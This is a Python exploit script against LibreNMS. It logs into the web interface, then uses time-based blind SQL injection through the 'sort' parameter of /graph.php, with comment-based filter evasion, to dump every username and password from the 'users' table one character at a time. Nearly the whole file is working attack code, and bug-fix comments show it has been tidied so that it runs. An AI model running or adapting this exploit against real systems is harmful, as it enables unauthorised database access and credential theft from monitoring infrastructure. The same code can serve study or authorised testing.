import requests
import urllib3
import os
import sys
import re
from bs4 import BeautifulSoup
# Optional intercepting-proxy address (e.g. Burp); empty string disables it.
proxy = ""
for _proxy_var in ("http_proxy", "HTTP_PROXY", "https_proxy", "HTTPS_PROXY"):
    os.environ[_proxy_var] = proxy

# Every request is sent with verify=False, so suppress the resulting
# InsecureRequestWarning noise up front.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Per-request timeout in seconds.
timeout = 10

# Boilerplate wrapped around every time-based injection payload.
inj_prefix = "(select(sleep("
inj_suffix = ")))))"

# Inclusive codepoint ranges used while guessing characters:
# '0'..'9' for row counts, printable ASCII for extracted data.
dec_begin = 48
dec_end = 57
ascii_begin = 32
ascii_end = 126
def keyboard_interrupt():
    """Report the Ctrl-C to the user and terminate with status 0."""
    print("\n\n[*] User requested an interrupt, exiting...")
    sys.exit(0)
def http_headers():
    """Return the static HTTP headers sent with every request."""
    return {'User-Agent': 'Mozilla'}
def check_auth(url, headers):
    """Probe /graph.php and report whether it requires authentication.

    Returns True when the response body contains "Unauthorized".
    """
    print("[*] Checking if authentication for page is required...")
    resp = requests.get(url + "/graph.php", headers=headers,
                        timeout=timeout, verify=False)
    return "Unauthorized" in resp.text
def get_initial_token_and_cookies(url, headers):
    """Fetch the login page and extract the CSRF token and session cookies.

    Returns a (token, cookies) tuple; token is None when no hidden
    ``_token`` input is found in the login form.
    """
    print("[*] Visiting page to retrieve initial token and cookies...")
    target = url + "/login"
    r = requests.get(target, headers=headers, timeout=timeout, verify=False)
    soup = BeautifulSoup(r.text, 'html.parser')
    for n in soup('input'):
        # n['name'] raises KeyError on inputs without a name attribute and
        # the original bailed out on the first non-token input; use .get()
        # and keep scanning until the CSRF token field is found.
        if n.get('name') == "_token":
            return n['value'], r.cookies
    return None, r.cookies
def get_valid_cookie(url, headers, token, cookies, usern, passw):
    """Log in with the given credentials and return the session cookies.

    Exits the process when the post-login page does not look authenticated
    (i.e. the LibreNMS overview title is missing).
    """
    print("[*] Retrieving authenticated cookie...")
    appl_cookie = "laravel_session"
    post_data = {
        '_token': token,
        'username': usern,
        'password': passw,
        'submit': '',
    }
    r = requests.post(url + "/login", data=post_data, headers=headers,
                      cookies=cookies, timeout=timeout, verify=False)
    if "Overview | LibreNMS" not in r.text:
        print("[!] No valid response from used session, exiting!\n")
        exit(-1)
    return r.cookies
def sqli(url, headers, cookies, inj_str, sleep):
    """Send one time-based injection request and time the response.

    Spaces in ``inj_str`` are replaced with ``/**/`` comments to evade
    filtering. Returns True when the response took at least ``sleep``
    seconds, i.e. the injected condition evaluated true server-side.
    """
    comment_inj_str = re.sub(" ", "/**/", inj_str)
    inj_params = {'id': '1',
                  'stat': 'none',
                  'type': 'port_mac_acc_total',
                  'sort': comment_inj_str,
                  'debug': '1'}
    # Build the query string by hand so the payload is not URL-encoded,
    # which would mangle the injection.
    inj_params_unencoded = "&".join("%s=%s" % (k, v) for k, v in inj_params.items())
    r = requests.get(url, params=inj_params_unencoded, headers=headers,
                     cookies=cookies, timeout=timeout, verify=False)
    # elapsed.total_seconds() is always a real number, so the original
    # third branch ("something went wrong") was unreachable; a plain
    # comparison covers both cases.
    return r.elapsed.total_seconds() >= sleep
def get_rows(url, headers, cookies, table, sleep):
    """Extract the row count of ``table`` via time-based blind SQLi.

    Recovers COUNT(*) digit by digit, up to ``max_pos_rows`` digits.
    Returns the count as an int, or False when nothing was extracted.
    """
    rows = ""
    max_pos_rows = 4  # supports counts up to 9999 rows
    for pos in range(1, max_pos_rows + 1):
        # First probe: is there any character (ORD > 1) at this position?
        direction = ">"
        inj_str = (inj_prefix + str(sleep)
                   + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM "
                   + table + ")," + str(pos) + ",1))" + direction + "1,0,"
                   + str(sleep) + inj_suffix)
        if not sqli(url, headers, cookies, inj_str, sleep):
            break
        # Second phase: test each digit '0'..'9' for equality.
        direction = "="
        for num_rows in range(dec_begin, dec_end + 1):
            row_char = chr(num_rows)
            # BUG FIX: the original read `"=+ direction` here, which is a
            # SyntaxError; the intended concatenation is `" + direction`.
            inj_str = (inj_prefix + str(sleep)
                       + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM "
                       + table + ")," + str(pos) + ",1))" + direction
                       + str(num_rows) + ",0," + str(sleep) + inj_suffix)
            if sqli(url, headers, cookies, inj_str, sleep):
                rows += row_char
                print(row_char, end='', flush=True)
                break
    if rows != "":
        print("\n[*] Found " + rows + " rows of data in table '" + table + "'\n")
        return int(rows)
    else:
        return False
def get_data(url, headers, cookies, row, column, table, sleep):
    """Extract one column value from one row via time-based blind SQLi.

    Guesses each character position (up to ``max_pos_len`` - 1 characters)
    across the printable ASCII range. Returns the recovered string.
    """
    extracted = ""
    max_pos_len = 50
    print("[*] Extracting strings from row " + str(row + 1) + "...")
    for pos in range(1, max_pos_len):
        # First probe: does a printable character (> 0x20) exist here?
        direction = ">"
        # BUG FIX: the original read `str(row) += ","` here, which is a
        # SyntaxError; the intended concatenation is `str(row) + ","`.
        inj_str = (inj_prefix + str(sleep)
                   + "-(if(ord(mid((select ifnull(cast(" + column
                   + " as NCHAR),0x20) from " + table + " LIMIT " + str(row)
                   + ",1)," + str(pos) + ",1))" + direction + str(ascii_begin)
                   + ",0," + str(sleep) + inj_suffix)
        if not sqli(url, headers, cookies, inj_str, sleep):
            break
        # Second phase: test each printable ASCII codepoint for equality.
        direction = "="
        for guess in range(ascii_begin, ascii_end + 1):
            extracted_char = chr(guess)
            inj_str = (inj_prefix + str(sleep)
                       + "-(if(ord(mid((select ifnull(cast(" + column
                       + " as NCHAR),0x20) from " + table + " LIMIT " + str(row)
                       + ",1)," + str(pos) + ",1))" + direction + str(guess)
                       + ",0," + str(sleep) + inj_suffix)
            if sqli(url, headers, cookies, inj_str, sleep):
                extracted += extracted_char
                print(extracted_char, end='', flush=True)
                break
    return extracted
def main(argv):
    """Drive the attack: authenticate, then dump credential columns via SQLi.

    Reads <username> <password> <url> <sleep_in_seconds> from sys.argv.
    """
    if len(sys.argv) == 5:
        usern = sys.argv[1]
        passw = sys.argv[2]
        url = sys.argv[3]
        sleep = int(sys.argv[4])
    else:
        print("[*] Usage: " + sys.argv[0] + " <username> <password> <url> <sleep_in_seconds>\n")
        exit(0)
    headers = http_headers()
    try:
        token, cookies = get_initial_token_and_cookies(url, headers)
        auth_required = check_auth(url, headers)
        if auth_required:
            valid_cookies = get_valid_cookie(url, headers, token, cookies, usern, passw)
        else:
            valid_cookies = cookies
            print("[+] Authentication not required, continue without authentication...")
        url = url + "/graph.php"
        columns = ['username', 'password']
        table = "users"
        print("[*] Printing number of rows in table...")
        rows = get_rows(url, headers, valid_cookies, table, sleep)
        if not rows:
            print("[!] Unable to retrieve rows, checks requests.\n")
            exit(-1)
        for column in columns:
            print("[*] Retrieving " + str(rows) + " rows of data using '" + column + "' as column and '" + table + "' as table...")
            for row in range(0, rows):
                retrieved = get_data(url, headers, valid_cookies, row, column, table, sleep)
                print("\n[*] Retrieved value '" + retrieved + "' for column'" + column + "' in row " + str(row + 1))
        print("\n[+] Done!\n")
    except requests.exceptions.Timeout:
        print("[!] Timeout error\n")
        exit(-1)
    except requests.exceptions.TooManyRedirects:
        print("[!] Too many redirects\n")
        exit(-1)
    except requests.exceptions.ConnectionError:
        print("[!] Not able to connect to URL\n")
        exit(-1)
    except requests.exceptions.HTTPError as e:
        # BUG FIX: this handler came after the RequestException catch-all
        # (HTTPError subclasses RequestException, so it was unreachable) and
        # used e.code, which requests' HTTPError does not define.
        print("[!] Failed with error code - " + str(e) + "\n")
        exit(-1)
    except requests.exceptions.RequestException as e:
        print("[!] " + str(e))
        exit(-1)
    except KeyboardInterrupt:
        keyboard_interrupt()
        exit(-1)
# Script entry point. argv[0] is stripped here, though main() reads
# sys.argv directly and ignores its argument.
if __name__ == "__main__":
    main(sys.argv[1:])